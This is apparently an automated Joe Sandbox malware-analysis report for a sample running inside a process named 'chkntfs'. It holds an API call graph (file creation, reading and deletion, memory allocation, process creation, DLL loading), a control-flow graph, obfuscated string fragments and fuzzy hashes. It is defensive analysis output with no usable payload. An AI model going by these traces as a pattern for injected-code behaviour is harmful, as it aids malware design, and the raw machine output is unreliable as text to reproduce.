NtCreateFile 100412->100413 100415 24a9480 100416 24a949a 100415->100416 100419 44c2df0 LdrInitializeThunk 100416->100419 100417 24a94c2 100419->100417 100420 24a0b00 100421 24a0b23 100420->100421 100422 2494f00 LdrLoadDll 100421->100422 100423 
24a0b47 100422->100423 100424 24a9300 100425 24a9392 100424->100425 100427 24a932e 100424->100427 100429 44c2ee0 LdrInitializeThunk 100425->100429 100426 24a93c3 100429->100426 100430 2493118 100431 2493138 100430->100431 100432 2496c60 2 API calls 100431->100432 100433 2493143 100432->100433 100434 2489f50 100436 2489f5f 100434->100436 100435 2489fa0 100436->100435 100437 2489f8d CreateThread 100436->100437 100438 2497ad0 100439 2497aec 100438->100439 100447 2497b3f 100438->100447 100441 24a9e80 NtClose 100439->100441 100439->100447 100440 2497c77 100442 2497b07 100441->100442 100448 2496ef0 NtClose LdrInitializeThunk LdrInitializeThunk 100442->100448 100444 2497c51 100444->100440 100450 24970c0 NtClose LdrInitializeThunk LdrInitializeThunk 100444->100450 100447->100440 100449 2496ef0 NtClose LdrInitializeThunk LdrInitializeThunk 100447->100449 100448->100447 100449->100444 100450->100440 100461 24a2150 100462 24a216c 100461->100462 100463 24a21a8 100462->100463 100464 24a2194 100462->100464 100466 24a9e80 NtClose 100463->100466 100465 24a9e80 NtClose 100464->100465 100467 24a219d 100465->100467 100468 24a21b1 100466->100468 100471 24ac020 RtlAllocateHeap 100468->100471 100470 24a21bc 100471->100470 100472 44c2ad0 LdrInitializeThunk 100473 2493aac 100478 2498710 100473->100478 100476 24a9e80 NtClose 100477 2493ad8 100476->100477 100479 2493abc 100478->100479 100480 249872a 100478->100480 100479->100476 100479->100477 100484 24a9570 100480->100484 100483 24a9e80 NtClose 100483->100479 100485 24a958a 100484->100485 100488 44c35c0 LdrInitializeThunk 100485->100488 100486 24987fa 100486->100483 100488->100486 100489 2496560 100490 2496590 100489->100490 100494 2498a90 100489->100494 100493 24965bc 100490->100493 100498 2498a10 100490->100498 100495 2498aa3 100494->100495 100505 24a93d0 100495->100505 100497 2498ace 100497->100490 100499 2498a54 100498->100499 100500 2498a75 100499->100500 100511 24a91a0 100499->100511 100500->100490 100502 2498a65 100503 2498a81 
100502->100503 100504 24a9e80 NtClose 100502->100504 100503->100490 100504->100500 100506 24a9451 100505->100506 100508 24a93fe 100505->100508 100510 44c2dd0 LdrInitializeThunk 100506->100510 100507 24a9476 100507->100497 100508->100497 100510->100507 100512 24a9220 100511->100512 100513 24a91ce 100511->100513 100516 44c4650 LdrInitializeThunk 100512->100516 100513->100502 100514 24a9245 100514->100502 100516->100514 100517 249cfa0 100519 249cfc9 100517->100519 100518 249d0cd 100519->100518 100520 249d073 FindFirstFileW 100519->100520 100520->100518 100522 249d08e 100520->100522 100521 249d0b4 FindNextFileW 100521->100522 100523 249d0c6 FindClose 100521->100523 100522->100521 100523->100518 100524 24a24e0 100528 24a24f9 100524->100528 100525 24a2544 100526 24abf00 RtlFreeHeap 100525->100526 100527 24a2554 100526->100527 100528->100525 100529 24a2584 100528->100529 100531 24a2589 100528->100531 100530 24abf00 RtlFreeHeap 100529->100530 100530->100531 100532 24a9de0 100533 24a9e57 100532->100533 100535 24a9e0b 100532->100535 100534 24a9e6d NtDeleteFile 100533->100534 100543 248bdf0 100544 248d461 100543->100544 100545 24abe70 NtAllocateVirtualMemory 100543->100545 100545->100544 100546 2489fb0 100547 248a442 100546->100547 100549 248a9a4 100547->100549 100550 24abb60 100547->100550 100551 24abb86 100550->100551 100556 24841a0 100551->100556 100553 24abb92 100555 24abbcb 100553->100555 100559 24a5fd0 100553->100559 100555->100549 100558 24841ad 100556->100558 100563 2493bb0 100556->100563 100558->100553 100560 24a6032 100559->100560 100562 24a603f 100560->100562 100574 2492360 100560->100574 100562->100555 100564 2493bcd 100563->100564 100566 2493be6 100564->100566 100567 24aa8d0 100564->100567 100566->100558 100569 24aa8ea 100567->100569 100568 24aa919 100568->100566 100569->100568 100570 24a94d0 LdrInitializeThunk 100569->100570 100571 24aa976 100570->100571 100572 24abf00 RtlFreeHeap 100571->100572 100573 24aa98f 100572->100573 100573->100566 100575 249239b 
100574->100575 100590 2498820 100575->100590 100577 24923a3 100578 2492686 100577->100578 100579 24abfe0 RtlAllocateHeap 100577->100579 100578->100562 100580 24923b9 100579->100580 100581 24abfe0 RtlAllocateHeap 100580->100581 100582 24923ca 100581->100582 100583 24abfe0 RtlAllocateHeap 100582->100583 100584 24923db 100583->100584 100589 2492478 100584->100589 100605 24973c0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100584->100605 100586 2494f00 LdrLoadDll 100587 2492632 100586->100587 100601 24a8910 100587->100601 100589->100586 100591 249884c 100590->100591 100592 2498710 2 API calls 100591->100592 100593 249886f 100592->100593 100594 2498879 100593->100594 100595 2498891 100593->100595 100596 2498884 100594->100596 100598 24a9e80 NtClose 100594->100598 100597 24988ad 100595->100597 100599 24a9e80 NtClose 100595->100599 100596->100577 100597->100577 100598->100596 100600 24988a3 100599->100600 100600->100577 100602 24a8972 100601->100602 100604 24a897f 100602->100604 100606 24926a0 100602->100606 100604->100578 100605->100589 100609 24926c0 100606->100609 100622 2498af0 100606->100622 100608 2492c26 100608->100604 100609->100608 100626 24a1b20 100609->100626 100612 24928da 100634 24ad0d0 100612->100634 100613 249271e 100613->100608 100629 24acfa0 100613->100629 100615 2498a90 LdrInitializeThunk 100616 249293f 100615->100616 100616->100608 100616->100615 100619 24911b0 LdrInitializeThunk 100616->100619 100617 24928ef 100617->100616 100640 24911b0 100617->100640 100619->100616 100620 2498a90 LdrInitializeThunk 100621 2492a93 100620->100621 100621->100616 100621->100620 100623 2498afd 100622->100623 100624 2498b1e SetErrorMode 100623->100624 100625 2498b25 100623->100625 100624->100625 100625->100609 100627 24abe70 NtAllocateVirtualMemory 100626->100627 100628 24a1b41 100627->100628 100628->100613 100630 24acfb0 100629->100630 100631 24acfb6 100629->100631 100630->100612 100632 24abfe0 RtlAllocateHeap 100631->100632 100633 24acfdc 
100632->100633 100633->100612 100635 24ad040 100634->100635 100636 24ad09d 100635->100636 100637 24abfe0 RtlAllocateHeap 100635->100637 100636->100617 100638 24ad07a 100637->100638 100639 24abf00 RtlFreeHeap 100638->100639 100639->100636 100641 24911d2 100640->100641 100643 24aa100 100640->100643 100641->100621 100644 24aa11a 100643->100644 100647 44c2c70 LdrInitializeThunk 100644->100647 100645 24aa142 100645->100641 100647->100645 100648 249b6f0 100653 249b400 100648->100653 100650 249b6fd 100667 249b070 100650->100667 100652 249b719 100654 249b425 100653->100654 100678 2498d00 100654->100678 100657 249b573 100657->100650 100659 249b58a 100659->100650 100660 249b581 100660->100659 100662 249b677 100660->100662 100697 249aac0 100660->100697 100663 249b6da 100662->100663 100706 249ae30 100662->100706 100665 24abf00 RtlFreeHeap 100663->100665 100666 249b6e1 100665->100666 100666->100650 100668 249b086 100667->100668 100671 249b091 100667->100671 100669 24abfe0 RtlAllocateHeap 100668->100669 100669->100671 100670 249b0b8 100670->100652 100671->100670 100672 2498d00 GetFileAttributesW 100671->100672 100673 249b3d2 100671->100673 100676 249aac0 RtlFreeHeap 100671->100676 100677 249ae30 RtlFreeHeap 100671->100677 100672->100671 100674 249b3eb 100673->100674 100675 24abf00 RtlFreeHeap 100673->100675 100674->100652 100675->100674 100676->100671 100677->100671 100679 2498d21 100678->100679 100680 2498d28 GetFileAttributesW 100679->100680 100681 2498d33 100679->100681 100680->100681 100681->100657 100682 24a3d30 100681->100682 100683 24a3d3e 100682->100683 100684 24a3d45 100682->100684 100683->100660 100685 2494f00 LdrLoadDll 100684->100685 100686 24a3d7a 100685->100686 100687 24a3d89 100686->100687 100710 24a37f0 LdrLoadDll 100686->100710 100689 24abfe0 RtlAllocateHeap 100687->100689 100693 24a3f37 100687->100693 100690 24a3da2 100689->100690 100691 24a3f2d 100690->100691 100690->100693 100695 24a3dbe 100690->100695 100692 24abf00 RtlFreeHeap 100691->100692 100691->100693 
100692->100693 100693->100660 100694 24abf00 RtlFreeHeap 100696 24a3f21 100694->100696 100695->100693 100695->100694 100696->100660 100698 249aae6 100697->100698 100711 249e510 100698->100711 100700 249ab5b 100701 249ace0 100700->100701 100703 249ab79 100700->100703 100702 249acc5 100701->100702 100704 249a980 RtlFreeHeap 100701->100704 100702->100660 100703->100702 100716 249a980 100703->100716 100704->100701 100707 249ae56 100706->100707 100708 249e510 RtlFreeHeap 100707->100708 100709 249aedd 100708->100709 100709->100662 100710->100687 100713 249e534 100711->100713 100712 249e541 100712->100700 100713->100712 100714 24abf00 RtlFreeHeap 100713->100714 100715 249e584 100714->100715 100715->100700 100717 249a99d 100716->100717 100720 249e5a0 100717->100720 100719 249aaa3 100719->100703 100721 249e5c4 100720->100721 100722 249e66e 100721->100722 100723 24abf00 RtlFreeHeap 100721->100723 100722->100719 100723->100722 100724 2497cb0 100725 2497cc8 100724->100725 100727 2497d22 100724->100727 100725->100727 100728 249bc20 100725->100728 100729 249bc46 100728->100729 100730 249be79 100729->100730 100755 24aa280 100729->100755 100730->100727 100732 249bcbc 100732->100730 100733 24ad0d0 2 API calls 100732->100733 100734 249bcdb 100733->100734 100734->100730 100735 249bdb2 100734->100735 100736 24a94d0 LdrInitializeThunk 100734->100736 100737 24964e0 LdrInitializeThunk 100735->100737 100739 249bdd1 100735->100739 100738 249bd3d 100736->100738 100737->100739 100738->100735 100741 249bd46 100738->100741 100754 249be61 100739->100754 100761 24a9040 100739->100761 100740 249bd9a 100743 2498a90 LdrInitializeThunk 100740->100743 100741->100730 100741->100740 100742 249bd78 100741->100742 100758 24964e0 100741->100758 100776 24a5160 LdrInitializeThunk 100742->100776 100747 249bda8 100743->100747 100747->100727 100748 2498a90 LdrInitializeThunk 100749 249be6f 100748->100749 100749->100727 100750 249be38 100766 24a90f0 100750->100766 100752 249be52 100771 24a9250 100752->100771 
100754->100748 100756 24aa29a 100755->100756 100757 24aa2ab CreateProcessInternalW 100756->100757 100757->100732 100760 249651e 100758->100760 100777 24a96a0 100758->100777 100760->100742 100762 24a90bd 100761->100762 100764 24a906b 100761->100764 100783 44c39b0 LdrInitializeThunk 100762->100783 100763 24a90e2 100763->100750 100764->100750 100767 24a916d 100766->100767 100768 24a911b 100766->100768 100784 44c4340 LdrInitializeThunk 100767->100784 100768->100752 100769 24a9192 100769->100752 100772 24a92cd 100771->100772 100774 24a927b 100771->100774 100785 44c2fb0 LdrInitializeThunk 100772->100785 100773 24a92f2 100773->100754 100774->100754 100776->100740 100778 24a9751 100777->100778 100780 24a96cf 100777->100780 100782 44c2d10 LdrInitializeThunk 100778->100782 100779 24a9796 100779->100760 100780->100760 100782->100779 100783->100763 100784->100769 100785->100773 100786 2497730 100787 249775a 100786->100787 100790 24988c0 100787->100790 100789 2497784 100791 24988dd 100790->100791 100797 24a95c0 100791->100797 100793 249892d 100794 2498934 100793->100794 100795 24a96a0 LdrInitializeThunk 100793->100795 100794->100789 100796 249895d 100795->100796 100796->100789 100798 24a965b 100797->100798 100800 24a95eb 100797->100800 100802 44c2f30 LdrInitializeThunk 100798->100802 100799 24a9694 100799->100793 100800->100793 100802->100799 100803 249a5b0 100805 249a5bf 100803->100805 100804 249a5c6 100805->100804 100806 24abf00 RtlFreeHeap 100805->100806 100806->100804 100807 24a9cf0 100808 24a9d97 100807->100808 100810 24a9d1b 100807->100810 100809 24a9dad NtReadFile 100808->100809 100812 24991b7 100813 24991ba 100812->100813 100814 2499171 100813->100814 100816 2497a50 100813->100816 100817 2497a66 100816->100817 100819 2497a9f 100816->100819 100817->100819 100820 24978c0 LdrLoadDll 100817->100820 100819->100814 100820->100819

                                                                      Control-flow Graph
                                                                      control_flow_graph 27 2489fb0-248a440 28 248a451-248a45d 27->28 29 248a45f-248a468 28->29 30 248a475-248a47f 28->30 31 248a46a-248a470 29->31 32 248a473 29->32 33 248a490-248a49c 30->33 31->32 32->28 35 248a49e-248a4b0 33->35 36 248a4b2 33->36 35->33 37 248a4b9-248a4d2 36->37 37->37 39 248a4d4-248a4de 37->39 40 248a4ef-248a4fb 39->40 41 248a4fd-248a505 40->41 42 248a521-248a52b 40->42 43 248a50c-248a50e 41->43 44 248a507-248a50b 41->44 45 248a53c-248a545 42->45 48 248a51f 43->48 49 248a510-248a519 43->49 44->43 46 248a56a-248a571 45->46 47 248a547-248a557 45->47 52 248a5a3-248a5ad 46->52 53 248a573-248a5a1 46->53 50 248a568 47->50 51 248a559-248a562 47->51 48->40 49->48 50->45 51->50 56 248a5be-248a5ca 52->56 53->46 57 248a5e8-248a5ef 56->57 58 248a5cc-248a5d8 56->58 61 248a5f1-248a607 57->61 62 248a614-248a61e 57->62 59 248a5da-248a5e0 58->59 60 248a5e6 58->60 59->60 60->56 65 248a609-248a60f 61->65 66 248a612 61->66 63 248a62f-248a63b 62->63 67 248a64b-248a65c 63->67 68 248a63d-248a649 63->68 65->66 66->57 69 248a66d-248a679 67->69 68->63 71 248a68a 69->71 72 248a67b-248a688 69->72 73 248a691-248a69a 71->73 72->69 75 248a8ea-248a8f4 73->75 76 248a6a0-248a6aa 73->76 78 248a905-248a911 75->78 77 248a6bb-248a6c4 76->77 79 248a6da-248a6dd 77->79 80 248a6c6-248a6d8 77->80 81 248a913-248a922 78->81 82 248a924-248a92e 78->82 85 248a6e3-248a6e7 79->85 80->77 81->78 83 248a93f-248a94b 82->83 89 248a94d-248a95f 83->89 90 248a961-248a968 83->90 87 248a6e9-248a6f2 85->87 88 248a715-248a71f 85->88 91 248a6f9-248a713 87->91 92 248a6f4-248a6f8 87->92 95 248a730-248a73c 88->95 89->83 93 248a96e-248a97a 90->93 94 248aa40-248aa4a 90->94 91->85 92->91 98 248a97c-248a99d 93->98 99 248a99f call 24abb60 93->99 97 248aa5b-248aa65 94->97 100 248a74d-248a75c 95->100 101 248a73e-248a74b 95->101 102 248aab9-248aac3 97->102 103 248aa67-248aab7 97->103 98->93 110 248a9a4-248a9ad 99->110 106 248a8a1-248a8ab 100->106 107 
248a762-248a769 100->107 101->95 109 248aad4-248aade 102->109 103->97 113 248a8bc-248a8c5 106->113 111 248a78a-248a794 107->111 112 248a76b-248a788 107->112 114 248aae0-248ab30 109->114 115 248ab32-248ab3b 109->115 117 248a9af-248a9d0 110->117 118 248a9d2-248a9dc 110->118 116 248a7a5-248a7b1 111->116 112->107 119 248a8db-248a8e5 113->119 120 248a8c7-248a8d9 113->120 114->109 123 248a7b3-248a7c5 116->123 124 248a7c7-248a7d1 116->124 117->110 125 248a9ed-248a9f9 118->125 119->73 120->113 123->116 126 248a7e2-248a7ec 124->126 128 248a9fb-248aa0d 125->128 129 248aa0f-248aa1b 125->129 130 248a7ee-248a81e 126->130 131 248a820-248a82a 126->131 128->125 129->94 132 248aa1d-248aa3e 129->132 130->126 134 248a83b-248a845 131->134 132->129 136 248a89f 134->136 137 248a847-248a89d 134->137 136->75 137->134
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !!$$$$4$%-$%0$(:$*$,$2;$4'$7$@]$@f$B$D$G$H$Jd$M<$M<$QD$_$_$c$cb$h$k$m1$s$w!$x$2$P$]
                                                                      • API String ID: 0-2774095859
                                                                      • Opcode ID: b89a179c66ba4be99a4adbec441b912c6e81bdf256819916907173be9fe26a28
                                                                      • Instruction ID: 5797f046d38590b60941ea8190330f53ef4bde99d50e81c7667973fa9600ddce
                                                                      • Opcode Fuzzy Hash: b89a179c66ba4be99a4adbec441b912c6e81bdf256819916907173be9fe26a28
                                                                      • Instruction Fuzzy Hash: 816288B0D15669CBEB24DF44C998BDDBBB2BB84309F1081DAC4096B385D7B95AC9CF40
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0249D084
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0249D0BF
                                                                      • FindClose.KERNELBASE(?), ref: 0249D0CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 2b4baf0e598f411f09611177379fb48106604199be111d715152f008809dadfc
                                                                      • Instruction ID: 3c179297ca68c53d4329c581ee55e2e3a1f53b0d5cda65aa3dd4a6d03553b03c
                                                                      • Opcode Fuzzy Hash: 2b4baf0e598f411f09611177379fb48106604199be111d715152f008809dadfc
                                                                      • Instruction Fuzzy Hash: 3A315271A00208BBDB24EB65CC85FEF777DAB54708F14455EB909A7180DB70AA858FA0
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,?,?,768535EC,?,?,?,?,?,?,?), ref: 024A9C81
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 838509e54f2c3364d4e31241d664639feca510ee22d101a62e60937b6d912ff3
                                                                      • Instruction ID: f98b9dfe0ce0c3b215a9b48438efeefb22f8eb84356ba08cdbf75daca0a7a4cd
                                                                      • Opcode Fuzzy Hash: 838509e54f2c3364d4e31241d664639feca510ee22d101a62e60937b6d912ff3
                                                                      • Instruction Fuzzy Hash: 0131D4B5A01248AFDB14DF99D881EEEB7B9EF88304F50811AF919A7340D770A841CFA4
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,?,768535EC,?,?,?,?,?), ref: 024A9DD6
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 996f1081be8b6bd0d481505ba80854a18546974636fedac09fe5db59dc8346e8
                                                                      • Instruction ID: cdefb60c192b7741514421820567cf8969bb2c2801780a6207234579b7487458
                                                                      • Opcode Fuzzy Hash: 996f1081be8b6bd0d481505ba80854a18546974636fedac09fe5db59dc8346e8
                                                                      • Instruction Fuzzy Hash: AA31D6B5A00208AFDB14DF99D841EEFB7B9EF88714F10821EF919A7245D770A851CFA4
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(0249271E,?,024A897F,768535EC,00000004,00003000,?,?,?,?,?,024A897F,0249271E), ref: 024AA0A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 8c6a582bc137f94b396dcefe995f7a27d6977d89f90340d5bd04032a234a9bd6
                                                                      • Instruction ID: ab901418bb49e912a574d561a9c6bd0a880654582941cb0ab2e80460ca8a2a6d
                                                                      • Opcode Fuzzy Hash: 8c6a582bc137f94b396dcefe995f7a27d6977d89f90340d5bd04032a234a9bd6
                                                                      • Instruction Fuzzy Hash: 8321F7B5A00209AFDB10DF99DC41EAF77B9EF98714F10851EF918A7241D770A911CFA4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: faa09dc2a236f09839a364d06909e5d020f342630ed6c269c30112f4f4111c35
                                                                      • Instruction ID: 623b807f065f23ecbc2ad2cd84cd99284261ecaacb04ca360dfeb92bf97e2e19
                                                                      • Opcode Fuzzy Hash: faa09dc2a236f09839a364d06909e5d020f342630ed6c269c30112f4f4111c35
                                                                      • Instruction Fuzzy Hash: 4A119E71A10208AFE720EB65CC01FEF73ADEF98718F50410EF918A7282E77165018BE5
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 024A9EB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction ID: 55f89be29ddbbff7d309c80c2568939ca96721cd188e0aa320f5368b3dbff0a0
                                                                      • Opcode Fuzzy Hash: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction Fuzzy Hash: 8FE04F316102187BD110AA5ADC11F9B776DDBC5710F41441AFA18A7142C67179018AE0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8a36a1ddd76b6a7908eb9bb3c4707f33338cd53bae1a9529bac9f0e52ff04dd6
                                                                      • Instruction ID: f83a8fab5c1053d910a20aefe84aa61b8cfda362b4840016825c8fdb09357e72
                                                                      • Opcode Fuzzy Hash: 8a36a1ddd76b6a7908eb9bb3c4707f33338cd53bae1a9529bac9f0e52ff04dd6
                                                                      • Instruction Fuzzy Hash: BC9002656015104265407158481441660159BF1305395C116A0655570C871CD9559269
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d8024f8d09d619768886fa3390bec32f48a58b3849b0b22aee41339a6172ee6c
                                                                      • Instruction ID: f7aa71ee678885bd260f51685528d9e20d590e9aeeee0ba514055590b1ba76d3
                                                                      • Opcode Fuzzy Hash: d8024f8d09d619768886fa3390bec32f48a58b3849b0b22aee41339a6172ee6c
                                                                      • Instruction Fuzzy Hash: 5990023560581012B5407158489455640159BF0305B55C012E0525564C8B18DA565361
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 28d87e31f68dd016c0119ece053ea4a1e43aa5866bd6b86a214456b57d279525
                                                                      • Instruction ID: f5cc4fbc7d47a942517c2258090ba8575f1e7c6993791e06df4cdc9f4e33d573
                                                                      • Opcode Fuzzy Hash: 28d87e31f68dd016c0119ece053ea4a1e43aa5866bd6b86a214456b57d279525
                                                                      • Instruction Fuzzy Hash: E390023520141842F50071584414B5600158BF0305F55C017A0225664D8719D9517521
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: dc394766b060576518084b2d49f5d0f95841db9143d338984850edc6709a8c0e
                                                                      • Instruction ID: e0dc4b6d3243a13eddaeda6a2352d81dea64d0a3044b26d00af33b9470367788
                                                                      • Opcode Fuzzy Hash: dc394766b060576518084b2d49f5d0f95841db9143d338984850edc6709a8c0e
                                                                      • Instruction Fuzzy Hash: 7590023520149802F5107158841475A00158BE0305F59C412A4525668D8799D9917121
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7ff9a2f338d280bdd2f59e05ed481975a1cea8e802f9eacd4a6f1930e27ec121
                                                                      • Instruction ID: b008a9eb927de027fd08e801e67642e566236f069611239afafe291bfd08e9e5
                                                                      • Opcode Fuzzy Hash: 7ff9a2f338d280bdd2f59e05ed481975a1cea8e802f9eacd4a6f1930e27ec121
                                                                      • Instruction Fuzzy Hash: 4D90023520141402F5007598541865600158BF0305F55D012A5125565EC769D9916131
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 926e2cee323f59d13eb14f600a7f4078bedda82421e71652c68f183f4d70f8d1
                                                                      • Instruction ID: 34cdef1476a51a213900dd1616393847af541d339a748eaa1eac0e31a3d50790
                                                                      • Opcode Fuzzy Hash: 926e2cee323f59d13eb14f600a7f4078bedda82421e71652c68f183f4d70f8d1
                                                                      • Instruction Fuzzy Hash: F490022D21341002F5807158541861A00158BE1206F95D416A0116568CCA19D9695321
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
